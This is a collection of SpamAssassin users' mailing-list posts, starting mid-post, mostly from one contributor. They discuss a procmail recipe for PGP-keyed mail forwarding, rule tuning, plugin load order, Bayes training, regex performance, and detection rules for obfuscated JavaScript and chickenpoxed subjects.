stupid as you can do far better --  consider hushmail or an ec2 system.)



I am therefore going to assume you're on an email infrastructure you
trust (for outgoing SMTPS, incoming IMAPS/POP3S, and secure storage of
your inbox/folders).  This means I will reinterpret your question as one
that asks about masking the sender and recipient while in the clear over
the internet and leaving a minimal footprint overall.  A further
assumption is that your recipients have and use PGP.  Otherwise, there's
really no point in this exercise.

If your recipients use SSL to connect to their email infrastructure and
you trust that infrastructure, you're done already; your message
should(?) be encrypted point-to-point and therefore only visible to the
trusted infrastructures on each end.  Anybody sniffing the traffic sees
only the two IPs involved.  PGP is merely an extra layer protecting you
from misplaced trust (nosy admins, service providers getting subpoenaed,
insecure server backups, etc).

Otherwise, there isn't much you can do unless you have at least partial
trust.

Here's a draft that can do most of that:

Create user encryptedmail in the recipient's email infrastructure (or on
a proxy if you really want that kind of thing).  Create a file at
/etc/mail/pgp-key-map with lines like 123ABC78=j...@example.com (sans
quotes) that maps known keys (8-char IDs) to approved recipient emails.
 Give encrypteduser this procmail recipe:


# Extract keys from message, get addresses from map file
KEY_RECIPS=`gpg --decrypt 21 |perl -ne '/key, ID ([0-9A-F]{8}),/ 
print $1\n' |grep -Fwf- /etc/mail/pgp-key-map |sed 's/^[^=]*=//'`

# If mapped keys were found and we're not looped, add anti-loop header
:0fhw
* KEY_RECIPS ?? @
* !^X-Proxied-By: encryptedmail@
|formail -A X-Proxied-By: encryptedm...@example.com

# Forward if above matched and was successful
:0a
! $KEY_RECIPS


The sending end is easy, though your encryption agent won't be happy
about encrypting a message to an address that isn't being sent to.  You
can encrypt /after/ signing rather than before and then alter your
from address to be uninformative if you want to hide this side (just
watch out for SPF and spam detection that keys on the sender
name/address).  The recipient will be able to identify you by your
signature after decrypting the message.  Remember that the Subject is
still in the clear.

Note:  the bad guys can do this too, unless the PGP keys are
unpublished.  That makes this security through obscurity; it's not
(currently) worth their while to look for because nobody does it and
it's much harder than merely scraping the To/Cc fields.  There is other
identifying information in the headers that can be (painfully) extracted
as well.  The above proposal does have those minor holes but is the best
~transparent way of doing this that I can think of short of a full-blown
remailer, which is only transparent to the recipient (after procmail
magic) since it would involve hackery at the client level for wrapping
up and sending a double-encrypted message.

Note 2:  This has a hole spammers can exploit.  You really need some way
of ensuring that the encryptedmail@proxy address is accessible only to
you.  You can do this with procmail by isolating some piece of your
messages (ideally the PGP signature, but if you need to hide that,
perhaps a specific IP or a DKIM-signed From address).



signature.asc
Description: OpenPGP digital signature


Re: Spamhaus and others check at MTA level: how disable in Spamassassin?

2012-08-07 Thread Adam Katz
On 08/06/2012 08:01 AM, Bowie Bailey wrote:
 Actually, since these are more complex rules, just setting the score to
 0 will not stop the DNS check.  This is what I have in my config:
 
 # Blocking Zen with MTA...don't need these
 meta RCVD_IN_SBL (0)
 meta RCVD_IN_XBL (0)
 meta RCVD_IN_PBL (0)
 score __RCVD_IN_ZEN 0

You have it backwards.

I'm pretty sure scoring a rule at zero will disable it, even the DNS
lookup, UNLESS it is an underscore-prefix rule (which is not scored).
Note that zeroing a meta rule that depends on a lookup does not disable
the dependent rule.  Lookups in underscored rules can only be disabled
by redefining the rule.

Parentheses in metas are just like in math, so the above quoted
definitions surrounding a statement in them is redundant (unlike for
scores, which makes them relative).  You'd likely do better with:

meta RCVD_IN_SBL 0
meta RCVD_IN_XBL 0
meta RCVD_IN_PBL 0
meta __RCVD_IN_ZEN 0

or

score RCVD_IN_SBL 0
score RCVD_IN_XBL 0
score RCVD_IN_PBL 0
meta __RCVD_IN_ZEN 0



signature.asc
Description: OpenPGP digital signature


Re: Spamhaus and others check at MTA level: how disable in Spamassassin?

2012-08-07 Thread Adam Katz
On 08/07/2012 09:19 AM, Bowie Bailey wrote:
 I don't know where I found those settings.  I did some testing and 
 verified that all three methods listed above will prevent the DNS
 query from running.
 
 I distinctly remember reading a while back that just setting the
 scores to 0 on the DNS blacklist rules would disable the scoring
 rules, but would not prevent the queries from running.  I even had
 the score lines you suggested in my local.cf file, but they were
 commented out and replaced by the lines I posted.  Maybe something
 has changed since then.

That would be a comment from Karsten Bräckelmann last October, archived
at
http://spamassassin.1065346.n5.nabble.com/Disable-a-Rule-td51492i20.html#d1320031215000-865
(I can't find the original, this is merely a reference to it).  The
relevant bit:

On 10/30/2011 08:20 PM, Karsten Bräckelmann wrote:
 Ned, you forgot to meta out __RCVD_IN_DNSWL to actually prevent the
 DNS query at all.

The meta out phrasing refers to the need to redefine the predicate
rule since you can't disable it with a score.



signature.asc
Description: OpenPGP digital signature


Re: How do I reenable AWL on spamassassin 3.3 after upgrade from 3.1

2012-08-02 Thread Adam Katz
 Den 2012-07-26 17:26, Nißl Reinhard skrev:
 reading the manuals, I've discovered that the AWL plugin isn't 
 loaded anymore in spamassassin 3.3. Therefore I put the
 following lines into local.cf:

 On Fri, 27 Jul 2012 02:57:26 +0200 Benny Pedersen wrote:
 oh no, do not put loadlugin into *.cf files its wrong pr design,
 but so much wiki and bad behavior still continues

Speaking Hawaiian? (wiki == quick)  Or does the wiki actually suggest
this behavior?

On 07/26/2012 06:14 PM, RW wrote:
 It seems inelegant, but is there a practical reason why this
 shouldn't be done. Some optional plugins such as Botnet and iXhash
 load themselves from their own .cf files.

Yes, there is a practical reason.

In short, .pre files are read before .cf files, allowing all rules
access to all plugins.  If a plugin was loaded in a .cf file, it would
not be available to .cf files that load earlier.



There is a very careful ordering to the loading of files to ensure that
newer versions and overrides are correctly loaded.  Others should
correct me if I have this wrong*

1. Load /etc/spamassassin/*.pre
2. If /var/lib/spamassassin/[version] exists:
   (a) Load its *.pre files and then its *.cf files
   (b) Otherwise, load *.pre then *.cf in /usr/share/spamassassin
3. Load /etc/spamassassin/*.cf
4. Parse in order of loading
5. If an include line is encountered, interrupt everything and
   (a) load the named file
   (b) parse the named file

Files within a directory are sourced by asciibetical order (same as
`ls`).  Sub-directories are NOT examined.  Each individual file is read
from top to bottom, pausing for include directives as noted above
(this is how the updates area can have a hierarchy).

This lets /etc/spamassassin/local.cf (or wherever your system puts it)
run last, thus allowing you to trump scores and definitions.

Because of the loading order, third party plugins and configs whose
installations suggest /etc/spamassassin should have file names that
asciibetically precede local.cf, ideally starting with two digits and an
underscore, mimicking the SA upstream (e.g. 20_drugs.cf).


Getting back to your question, this means that if Botnet or iXhash are
depended on before they are loaded, the dependent rule won't load
correctly.  The default install of iXhash doesn't have a problem here
because it's a self-contained item, so it loads the plugin and then uses
it later on in the same file.

This is not advisable because when you then go in to add additional
rules for that plugin, say by adding rules querying the third-party
iXhash repository from Spam-Eating Monkey in external.cf, it won't work
because the iXhash plugin isn't loaded until iXhash.cf.  Furthermore, it
prevents third-party sa-update channels from using the plugin since they
are loaded in step 2 while local.cf is loaded in step 3.

It also makes maintenance (and troubleshooting) harder, though
SpamAssassin will take it.  (There are lots of things SA can do that are
ill advised, like meta rules that use the ternary operator.)



The .pre files that live in /etc are kind of stuck named like that
(including init.pre, which is essentially v300.pre) due to their
location (otherwise, upgrading would require wiping them, which is taboo
in the Unix world).  I'd suggest installing an empty local.pre were it
not for the fact that this would come /before/ the others.  Maybe a
z_local.pre file?


* Footnote:  Methodology.

This should reveal the load order (but not the parse order):

spamassassin --lint -D config 21 |egrep -o '/.*\.(pre|cf)$' |uniq



signature.asc
Description: OpenPGP digital signature


Re: KB_FAKED_THE_BAT

2012-05-14 Thread Adam Katz
On 05/03/2012 10:02 AM, Mike Grau wrote:
 The meta rule in 72_active.cf KB_FAKED_THE_BAT is getting
 circumvented here because the meta rule component

  header   __KB_DATE_CONTAINS_TAB  Date:raw =~ /^\t
 
 is being evaded by spam that now has a space character before the tab:
 
 # grep Date: HEADERS | od -a
 000   D   a   t   e   :  sp  ht   T   h   u   ,  sp   3  sp   M   a
 020   y  sp   2   0   1   2  sp   1   6   :   5   3   :   5   9  sp
 040   +   0   7   0   0  nl
 046vi H*
 
 This has been Russian language spam (charset koi8-r) with various
 flavors of X-Mailer: The Bat!

What version of SpamAssassin are you running?  Here's a note from that
rule's definition (rulesrc/sandbox/kb/20_header.cf):

# NOTE  Depends on some header rule code fixes for 3.3.x to remove
#   the leading space that was showing up in header rules.  For
#   3.2.x releases the pattern must be changed to /^ \t/.

Karsten:  Maybe change it to   /^ ?\t/   as a workaround?
(Yes, I know we've stopped supporting sa3.2.x)



signature.asc
Description: OpenPGP digital signature


Re: Bayes_ignore

2012-04-06 Thread Adam Katz
On 04/01/2012 06:35 AM, joea wrote:
 While exploring Bayes stuff, (wanting to populate appropriately for
 my setup), found reference to removing headers that might confuse
 Bayes.
 
 Specifically bayes_ignore_header.
 
 The example they show is an X header.   Seems the ones spamassassin
 puts in there will be ignored without intervention.
 
 Is one only concerned with X headers?  What about things like
 Received From?   I have several upstream hosts.  Must these be
 specified?

The X- prefix is an old-fashioned convention that many argue should be
phased out.

There are two types of items you want to exclude, which may very well
include non-x-prefixed headers:

1. Headers added after SpamAssassin runs.  These can include anti-virus
(though lots of people run A/V before SA), internal mail server
(Exchange, procmail) headers, and those added by the mail client.

2. FP-prone filtering notes.  If your ISP includes its own spam filters
and you do not consider them reliable (if you do, why are you running
your own?), they will poison your bayes db.  The same thing goes for
some of the third party ClamAV rules (like the phishing detection).  Do
*not* get aggressive here: if in doubt, let Bayes play with it.

Proper Received header traversal is essential to getting SpamAssassin up
and humming.  Read the NETWORK TEST OPTIONS portion of the documentation
and be sure to specify your internal_networks, trusted_networks, and
msa_networks.  ALL deployments need at least trusted_networks (unless
you've disabled network tests, in which case I'd recommend something
other than SA) and many will improve given the differences between these
three.



signature.asc
Description: OpenPGP digital signature


Re: Regex help (targetting very long HTML comments)

2012-04-06 Thread Adam Katz
On 04/02/2012 09:40 AM, Kris Deugau wrote:
 Can anyone point out what bit of stupidity I'm committing in trying
 to use this:
 
 rawbody OVERSIZE_COMMENTm|!--(?!--).{32000,}|s
 
 to match messages that are mostly very very long HTML comment(s)?
 
 Testing the same regex against the whole raw message outside of SA
 seems to fire just fine.

There are already a few rules that do this sort of thing.  Use them as
models:

% grep html_text_match..comment 20_html_tests.cf
body HTML_COMMENT_SHORT eval:html_text_match('comment', '!(?!-).{0,6}')
body HTML_COMMENT_SAVED_URL eval:html_text_match('comment', '!-- saved
from url=\(\d{4}\)')
body __COMMENT_EXISTS eval:html_text_match('comment', '!.*?')

Try this:

body OVERSIZE_COMMENT  eval:html_text_match('comment',
'!--(?!.?--).{512,}--')

Any more that 512 chars isn't going to be helpful but will end up being
computationally expensive (I've played with this idea).  Also, I'd say
this is more of a ham indicator than a spam indicator.



signature.asc
Description: OpenPGP digital signature


Re: Some rules I created for suspicious Javascript practices

2012-02-16 Thread Adam Katz
On 02/15/2012 04:43 PM, Thomas Rutter wrote (as neon_overload):
 I have created some rules which I have found to be very effective so 
 far at identifying a certain type of spam that spamassassin 
 otherwises cannot detect.

 I hereby license them under the WTFPL which is GPL and Apache license
 compatible.

I am interpreting that license as rename things and they're essentially
public domain.  Rules have been renamed, tweaked, and added to
subversion for testing.  After the next ruleqa run (probably tomorrow),
you can see how they perform on the SpamAssassin corpus at
http://ruleqa.spamassassin.org/?srcpath=neon_overload.cf

The new versions, which are Apache License 2.0, are attached.  Note that
attribution, though not requested, is present.

Thomas Rutter:  If you have any objections to what I did, complain now.
# I hereby license them under the WTFPL which is GPL and Apache license
# compatible. -- Thomas Rutter/neon_overload to SA-users, 2012-02-16 00:43 UTC
# 
http://old.nabble.com/Some-rules-I-created-for-suspicious-Javascript-practices-tt3130.html
# 
# WTFPL 2.0 basically says rename things and they're essentially public domain
# Rules have been renamed and slightly tweaked

rawbody  JS_EXTRA_UNESCAPE  
/[+=]\s{0,9}unescape\s{0,9}\(\s{0,9}[']%(?i:6[1-9A-F]|7[0-9A])/
describe JS_EXTRA_UNESCAPE  JavaScript: Unnecessary URI escaping
#score LOCAL_UNNECESSARY_UNESCAPE 1.7

rawbody  JS_EXTRA_CONCAT
/[+=]\s{0,9}['][a-z0-9]{1,64}[']\+['][a-z0-9]{1,64}[']/i
describe JS_EXTRA_CONCATJavaScript: Unnecessary string concatination
#score LOCAL_UNNECESSARY_STRCONCAT 0.5

rawbody  JS_FROMCHARCODE/=\s{0,9}String\.fromCharCode\b/
describe JS_FROMCHARCODEJavaScript: function String.fromCharCode
#score LOCAL_HIDE_FROMCHARCODE 0.7

#rawbody  LOCAL_HIDE_URL/h\+tt\+p:\+\//
rawbody  JS_CONCATINATED_HTTP   
m@(?!http:/)h['+]{0,3}(?:t['+]{0,3}){2}p['+]{0,3}:['+]{0,3}/@
describe JS_CONCATINATED_HTTP   Contains concatenated URI like htt+p://...
#score LOCAL_HIDE_URL 0.7



signature.asc
Description: OpenPGP digital signature


Re: update channel list

2012-01-20 Thread Adam Katz
On 01/18/2012 09:25 AM, dar...@chaosreigns.com wrote:
 All of those are currently listed by Adam Katz on
 http://khopesh.com/wiki/Anti-spam
 I expect that list to be up to date.  
 He's an active spamassassin developer.  

All of my channels are still relevant, though the only actively
(automatically) updated one is khop-sc-neighbors.  khop-blessed is also
useful if you're looking for ways to limit FPs.  The rest are only
useful if you want to get more aggressive than the upstream, as almost
all of those rules are ready for promotion through my svn sandbox.

 That page also lists 90_2tld.cf.sare.sa-update.dostech.net.

That one is only useful for sa3.2.5 users.  I need to update my site.



signature.asc
Description: OpenPGP digital signature


Re: French rules

2011-12-08 Thread Adam Katz
On 12/08/2011 03:51 PM, LEVEAU Stanislas wrote:
 I am looking for French rules with sa-update?
 Does it exist?

Most of the body rules in previous versions of SpamAssassin were phased
out because the Bayesian filter does a *significantly* better job at
that sort of thing.  The few that remain target rarer patterns since
lower volume messages are more likely to evade the learning components.

You should therefore train the Bayes component.  Learn more at
http://wiki.apache.org/spamassassin/BayesInSpamAssassin

Bonne chance!



signature.asc
Description: OpenPGP digital signature


Re: Martin Gregorie's portmanteau rule building script

2011-11-30 Thread Adam Katz
On 11/30/2011 03:59 AM, Martin Gregorie wrote:
 On Tue, 2011-11-29 at 14:22 -0800, Adam Katz wrote:
 You might want to consider Regexp::Assemble for your tool, though
 that would require using perl. This would cause your man page's
 example rule to result in something like this:
 
body __AU0 /(?i-xsm:\balt[123]\b)/

 rather than your script's *much* slower:

body __AU0 /\b(alt1|alt2|alt3)\b/i

 Interesting idea. Currently my system's performance seems 'adequate',
 considering I'm running SA on an 866 mHz P3 box with 512 MB RAM:
 Min Avg  Max
 Scan times: 0.9 (   3401 bytes) 4.0128.3 (  72858 bytes)
 Msg sizes: 2258 (1.8 secs )   10474   507533 (6.2 secs )
 Messages:  2032
 
 What sort of speed-up would Regexp::Assemble provide? 
 How would that compare with compiling the portmanteau.cf file?

Great question.  I do not have an answer.

How much optimization does re2c provide?  I am under the impression all
it does is convert text-based PCREs to C/C++ code of some sort, which
fully(?) mimics the original regexp's logic, implying that optimization
before compilation matters a lot.

I popped into irc://freenode.net#regex to ask, but this is apparently
too archaic a question.  Maybe somebody will have an answer in time.  (I
am not motivated enough to create an impromptu benchmark suite myself.)



signature.asc
Description: OpenPGP digital signature


Re: How long can a rule be?

2011-11-29 Thread Adam Katz
Summary for the impatient:
Do not write rules like this.
Instead, train Bayes, make sure you're using DNSBLs.

On 11/25/2011 09:49 AM, Sergio wrote:
 I wrote all the HELO spammers that SA didn't caught
...
 header   CHARLY_RULE1ALL =~ /(...)/i
 describe CHARLY_RULE1Charly Spammers
 scoreCHARLY_RULE111

Given the description in your email, that should probably be:

header   CHARLY_RULE1X-Spam-Relays-Untrusted =~ / helo=(?:...) /i
describe CHARLY_RULE1A custom list of uncaught relay HELOs
scoreCHARLY_RULE14

You should be *very* careful about scoring any individual rule at or
above the spam flagging threshold (default is 5, do not lower).  There
is almost always a better (and safer!) solution.

 My concern is, is too much for just one rule or the rule can grow
 without limit?

Let's just say you don't need to worry about that.  We have several 150+
character rules on SA's trunk and I've seen rules with regexp lengths in
the thousands (not that that's necessarily a good thing, but it does
work, albeit slowly).


Still, this seems like a really bad idea; one hammy HELO in there and
the whole thing starts hurting.  I think you'll be *far* better served
by training bayes.

You should also double check to ensure your DNS lookups are properly
configured and plugins like Razor are turned on.  We don't have the best
of resources to walk you through this, but you can start with
http://wiki.apache.org/spamassassin/DnsBlocklists#Questions_And_Answers



signature.asc
Description: OpenPGP digital signature


Martin Gregorie's portmanteau rule building script

2011-11-29 Thread Adam Katz
On 11/25/2011 10:13 AM, Martin Gregorie wrote:
 Subject: [Fwd: Re: How long a rule can be?]

My main answers to the original thread were posted there (today). I
guess I'm too accustomed to orderly threads; coupling my threaded view
in thunderbird with the big pile of mail unread since before the holiday
and I missed this thread when responding to the original.

If you want to fork the thread into a tangent, please change the subject
so other responses to it don't follow you.  Also, don't respond to the
parts of the thread you are not forking; those belong in another message
in the original thread.

/rant


 If you're finding your rule is starting to get difficult to maintain,
 take a look at my rule assembly tool, which is designed to allow such
 rules to be defined in an easily edited file for each rule that are
 used to create a single .cf file. See: 
 http://www.libelle-systems.com/free/portmanteau/portmanteau.tgz
 
 I was thinking of using a server plus plugin to do this but was 
 convinced that this 'portmanteau rule' approach was better: it 
 certainly works well for me.

You might want to consider Regexp::Assemble for your tool, though that
would require using perl.  This would cause your man page's example rule
to result in something like this:

   body __AU0 /(?i-xsm:\balt[123]\b)/

rather than your script's *much* slower:

   body __AU0 /\b(alt1|alt2|alt3)\b/i



signature.asc
Description: OpenPGP digital signature


Re: (Non-) Capturing REs

2011-10-25 Thread Adam Katz
On Mon, 2011-10-24 at 13:58 -0700, Adam Katz wrote:
 Using special variables like those you mentioned are particularly 
 bad, [...] That's not to say that the extra memory consumption
 from an unnecessary grouping doesn't impact performance.

On 10/24/2011 02:45 PM, Karsten Bräckelmann wrote:
 Well, does it? Measurably? Even if the RE does *not* match?

If the RE doesn't match, I doubt it.  Not sure though.

 If so, does it still have any measurable effect, if we're talking a 
 handful custom rules, with stock rules using non-capturing grouping?
 (The objective here is a trade-off between optimized REs and not 
 confusing users who aren't intimately familiar with REs. They tend to
 get heavy to grasp rather quickly, and the extra ?: weird chars don't
 help that.)

Interesting point.  Maybe we shouldn't get into such detail with an
admin that just wants to add a few rules.

Also, there are better ways to optimize rules; e.g. assuming matchers
don't consume memory if the RE doesn't match, starting the RE
unambiguously -- non-parenthetical, non-globbed, non-character-class,
etc, ideally starting with a rare character; /\bfoo (bar|vaz)/ is better
than /(foo bar|foo vaz)/ while perl's left-to-right nature makes the
gain on /\b(hello|goodbye) world\b/ over /(hello world|goodbye world)/
far less notable (it's only notable if lots of other things commonly
follow hello).

 Is it really worth it, religiously using non-capturing grouping?
 
 From the profiling I've seen, yes it is.  (I don't have data to 
 share though, sorry).
 
 The profiled code, does it use the special match capturing variables
 *anywhere* in the entire program? The profiled and compared 
 versions, would that be like the equivalent of using capturing vs 
 non-capturing in all SA stock rules?

I'm not sure, though I seem to recall the SA debug output includes the
matched text (which implies $), though if this were important, I'm sure
we'd have already concluded it worthwhile to do stupid things like
surrounding entire regexps with (?=this).

 Not trying to be confrontational, just honestly asking and wondering
 about the real impact. After all, the perlre docs specifically 
 mention to strongly prefer non-capturing grouping basically once
 only -- in the warning paragraph about the special vars.

The perl docs may have cut that for simplicity, just as you're
suggesting above ;-)

In reality, optimizing (including gaming of Perl's built-in
optimizations) is quite non-trivial.  Here's an excerpt from O'Reilly's
Mastering Regular Expressions (2nd Ed, page 253):

 Let me give a somewhat crazy example: you find  (000|999)$  in a Perl
 script, and decide to turn those capturing parentheses into 
 non-capturing parentheses. This should make things a bit faster, you
 think, since the overhead of capturing can now be eliminated. But 
 surprise, this small and seemingly beneficial change can slow this 
 regex down by /several orders of magnitude/ (thousands and thousands 
 of times slower). /What!?/ It turns out that a number of factors come
 together just right in this example to cause the end of 'string/line
 anchor optimization' (pg 246) to be turned off when non-capturing 
 parentheses are used. I don't want to dissuade you from using 
 non-capturing parentheses with Perl--their use is beneficial in the 
 vast majority of cases--but in this particular case, it's a
 disaster.



signature.asc
Description: OpenPGP digital signature


Re: (Non-) Capturing REs

2011-10-24 Thread Adam Katz
On 10/23/2011 06:44 PM, Karsten Bräckelmann wrote:
 [...] as I read it, the warning is referring to the usage of the 
 special $, $` and $' match capturing variables, resulting in a 
 substantial performance penalty -- and mentions the non-capturing 
 extended regex in this *context*, since it uses the same mechanism
 for the $n matches. If these special vars are used.

Using special variables like those you mentioned are particularly bad,
especially with some of the older versions of perl (I seem to recall
some of them getting big performance boosts in more recent perl
revisions).  That's not to say that the extra memory consumption from an
unnecessary grouping doesn't impact performance.

 Now, I just grepped the entire SA source code, and NONE of these
 spacial vars are used. Yay!  (I did not grep all external SA
 dependencies, mind you.)

I'm guessing I'm not the only person that looks through the rules
periodically for such things, including frivolous portions like the glob
in /foo.*/ or the range in /bar\W{2,30}/ and wipe them out to become
e.g. /foo/ and /bar\W{2}/

 So, does this substantial performance penalty using capturing
 groups even apply to SA?
 
 Is it really worth it, religiously using non-capturing grouping?

From the profiling I've seen, yes it is.  (I don't have data to share
though, sorry).



signature.asc
Description: OpenPGP digital signature


Re: Chickenpoxed subjects

2011-10-20 Thread Adam Katz
On 10/19/2011 04:43 AM, Mynabbler wrote:
 You are kidding, right? 50% of this crap comes from FREEMAIL
 addresses, and even more specific: 44% of this crap is delivered by
 aol.com.  The aol deliveries have about 85% unique from@aol
 addresses, so they pretty much 'own' aol.

We're writing spam filters, not idiot filters.  The fact that there is
so much overlap is often useful, bit the overlap is not complete.  There
is also a decent amount of overlap between the
mostly-computer-illiterate and freemail users.  I think this drives your
current line of thinking.

There are a lot of people that do very spammy things.  It is a testament
to SA and other filters that such non-spam doesn't so commonly flag as spam.



signature.asc
Description: OpenPGP digital signature


Re: Rule to count freemail recipients?

2011-10-18 Thread Adam Katz
On 10/17/2011 08:42 PM, Tom wrote:
 I'm using a couple rules I found here that hits when there are 5-9 or
 10+ recipients:
 
 header __COUNT_RCPTS ToCc =~ /(?:[^@,\s]+@[^@,\s]+)/
 tflags __COUNT_RCPTS multiple
 
 meta RCPTS_5_10 (__COUNT_RCPTS = 5)
 score RCPTS_5_10 1.0
 describe RCPTS_5_10 Message has 5 or more recipients
 
 meta RCPTS_10_PLUS (__COUNT_RCPTS = 10)
 score RCPTS_10_PLUS 1.0
 describe RCPTS_10_PLUS Message has 10 or more recipients

We get requests for this all the time on this list.  Several
implementations have been made and then removed (some may even still
exist in svn sandboxes) for their poor performance.  While none of them
(including your own) have specifically hunted freemail recipients, I can
tell you from experience that this won't help reduce false positives.



signature.asc
Description: OpenPGP digital signature


Re: Chickenpoxed subjects

2011-10-17 Thread Adam Katz
On 10/15/2011 03:37 PM, John Hardin wrote:
 On Thu, 13 Oct 2011, Mynabbler wrote:
 
 Typically the chickenpox rules do not get a lot of love abroad,
 since they tend to trip over other languages than English. However,
 does someone have an idea how to use the logic in chickenpox for
 subjects like these:
 
 ... or does someone have a decent rule to tag this kind of crap?
 
 I've got something in local masscheck right now, should commit later 
 today. Check my sandbox tomorrow.

header  __SUBJ_OBFU_PUNCT  Subject =~
/(?:[-~`!@\#$%^*()_+={}|\\\/?,.:;][a-z][-~`!@\#$%^*()_+={}|\\\/?,.:;\s]|[a-z][~`!@\#$%^*()_+={}|\\\/?,.:;][a-z])/i

How does this differ from a negation, like:

/[^\[\]'\w\s][a-z][^\[\]'\w]|[a-z][^\[\]'\w\s-][a-z]/i

and how does this not FP all over the place with subjects like:

Time for F-U-N
I like DD and rockroll
/var/spool/mail is full


I think this would satisfy the original request:

header   __SUBJ_LACKS_WORDS
  Subject !~ /(?!^.{0,15}$)(?:^|\s)[a-z]{3,15}(?:\s|$)/

(I have not checked that in, feel free if you like it.)



signature.asc
Description: OpenPGP digital signature


Re: Chickenpoxed subjects

2011-10-17 Thread Adam Katz
On 10/17/2011 02:29 PM, Adam Katz wrote:
 I think this would satisfy the original request:
 
 header   __SUBJ_LACKS_WORDS
   Subject !~ /(?!^.{0,15}$)(?:^|\s)[a-z]{3,15}(?:\s|$)/
 
 (I have not checked that in, feel free if you like it.)

Okay, that needed a little work (boo to double-negatives).  Also, I
hadn't noticed the new thread (sorry).

Just checked this in:

header __SUBJ_NOT_SHORTSubject =~ /^.{16}/
header __SUBJ_HAS_WORDSSubject =~ /(?:^|\s)[^\W0-9_]{3,15}(?:\s|$)/
meta SUBJ_LACKS_WORDS  __SUBJ_NOT_SHORT  !__SUBJ_HAS_WORDS 
!__SUBJECT_ENCODED_B64
describe SUBJ_LACKS_WORDS  Non-short subject lacks words

Even this will hit a fair amount of ham, especially with foreign
languages (I tried to work around this with [^\W0-9_] instead of [a-z]
in the event a locale is in use).



signature.asc
Description: OpenPGP digital signature


Re: Chickenpoxed subjects

2011-10-17 Thread Adam Katz
On 10/17/2011 04:36 PM, John Hardin wrote:
 On Mon, 17 Oct 2011, Adam Katz wrote:
 Time for F-U-N
 I like DD and rockroll
 /var/spool/mail is full
 
 It must hit more than a specified number of times. __SUBJ_OBFU_PUNCT
 isn't scored, SUBJ_OBFU_PUNCT_FEW and SUBJ_OBFU_PUNCT_MANY are.

Each of my examples hits SUBJ_OBFU_PUNCT_FEW, and it wouldn't be hard
for them to hit SUBJ_OBFU_PUNCT_MANY either.

 I think this would satisfy the original request:

 header   __SUBJ_LACKS_WORDS
   Subject !~ /(?!^.{0,15}$)(?:^|\s)[a-z]{3,15}(?:\s|$)/

 (I have not checked that in, feel free if you like it.)
 
 When I get home tonight.

See my other email, already checked in :-)



signature.asc
Description: OpenPGP digital signature


Re: New Bayes like paradigm

2011-10-13 Thread Adam Katz
 On 9/28/2011 8:02 AM, dar...@chaosreigns.com wrote:
 You definitely have a good point that it would only be necessary to
 track the combinations that actually show up in emails, however
 1024 is only the possible combinations from one set of 10 rules.
 The number of combinations in the actual corpora would be much
 higher.  I'll try to get you a number.

On 10/10/2011 06:55 AM, Marc Perkel wrote:
 You wouldn't have to store all combinations. You could just do up to
 3 levels and only the combinations that actually occur and use a hash
 to look up the combinations.

The data is all there if you have access to the spam.log and ham.log
files created by mass-check (warning, this code was composed in email,
not vim, and it has not been run):

#
#!/bin/sh
# Give three rules as arguments.  Assumes ham.log and spam.log in PWD

export GREP_OPTIONS=--mmap

tp=`grep -w $1 spam.log |grep -w $2 |grep -wc $3`
fp=`grep -w $1  ham.log |grep -w $2 |grep -wc $3`

spams=`grep -c '^[^#]' spam.log`
hams=` grep -c '^[^#]' ham.log`

tpr=`echo scale=5; $tp * 100 / $spams |bc`
fpr=`echo scale=5; $fp * 100 / $hams  |bc`

so=`echo scale=4; $tpr / ($tpr + $fpr) |bc`

echo meta rule  $1  $2  $3
echo   SPAM% $tpr   HAM% $fpr   S/O $so
#

Now you can pick your thresholds for moving forward (and your thresholds
for saving a combination as a no-go in the future).  These numbers are
just as valid as anything you'd get through the actual mass-check run.

Still, I worry about what this does to the GA.


PS:  As an SA Committer, do I have access to those logs?



signature.asc
Description: OpenPGP digital signature


Re: antiphishing

2011-10-12 Thread Adam Katz
On 10/12/2011 11:48 AM, dar...@chaosreigns.com wrote:
 Which uses it as part of SPOOFED_URL (the __ in the other rule is
 important), which is described as:
 Has a link whose text is a different URL.  But that one hasn't made it
 into the default rule set yet.  Ah, it hits 1.1% of spam but also 0.7% of
 non-spam, shame:
 http://ruleqa.spamassassin.org/?daterev=20111008-r1180336-nrule=%2Fspoofed
 (it got a T_ prepended to it due to being in testing)
 
 Wonder what it's hitting in non-spam.  And if it could be improved by just
 checking for domain mismatch instead of complete url match, if it's not
 doing that already.

As noted in the comment right next to the rule, most of those hits are
marketing trackers.  Another abutting comment notes that LeadLander has
a truncation habit that used to cause it to mis-fire.  There are also
abbreviations, parsing errors (not necessarily from SA), and probably
also link shorteners and gags.

I was a little out of sync with subversion.  This is now fixed.

While the new version is a bit better, it's still nowhere near good
enough to become a stand-alone rule, even with all the help I tried to
give it.



signature.asc
Description: OpenPGP digital signature


Re: Your mailbox has exceeded...

2011-09-30 Thread Adam Katz
 On 30/09/11 01:41, jida...@jidanni.org wrote:
 Sure a lot of Your mailbox has exceeded spam these days.

Phish rises this time of year ;-)

On 09/30/2011 09:31 AM, Ned Slider wrote:
 I've seen a few of these, but probably not enough examples to have
 Bayes reliably catch them yet - the first few sneaked straight
 through uncaught.

Right, phish thrives on low volume so it can stay under the radar.
Bayes is not good at catching such things.

 If we could organise a working group or something, and/or collect 
 some examples, I'd happily help with writing some rules specifically 
 for these.

I'd be game for helping there too.  Phish Tank is a starting point,
though it is riddled with non-phish (both spam and FPs).



signature.asc
Description: OpenPGP digital signature


Re: Plugin for Spanish Spams?

2011-09-09 Thread Adam Katz
On 09/09/2011 02:16 AM, Alok Kushwaha wrote:
 I am using the 'SpamAssassin Server version 3.3.2'  but 'Spanish
 spams' are getting through.  Can anyone please suggest/point me the
 rule-set/plug-in for Spanish spams.

The short answer is to train bayes; it's far better at this sort of
thing than anything else, even the language detection I'm about to suggest.


Enable (un-comment) TextCat in v310.pre and then add this to your
local.cf (adjust as needed):

ok_languages en hi


If that's not enough, create an anti-Spanish rule:

header SPANISH_BODY  X-Languages =~ /\bes/

(You'll have to verify that header name, I thought we always named our
headers and pseudo-headers X-Spam-*.  Also note that this is a
pseudo-header, which means it doesn't show up in your emails unless you
tell it to, e.g. with a line like add_header all Languages _LANGUAGES_
though then it will always be named X-Spam-Languages)

See also the perldoc/man page for Mail::SpamAssassin::Plugin::TextCat


Note that Spanish is not the easiest language to detect given its
similarities to English in addition to the fact that most conversations
are spattered with English words and even phrases.  This can only do so
much.

Axb's solution is dangerous but might work for you:
 you mean block ñ á é ó í  and what else? the rest is quivalent to en 

So maybe something like:

body __HAS_N_TILDE/[\xf1\xd1][a-z]/
body __HAS_A_ACUTE/[\xc1\xe1]/
body __HAS_E_ACUTE/[\xc9\xe9]/
body __HAS_I_ACUTE/[\xcd\xed]/
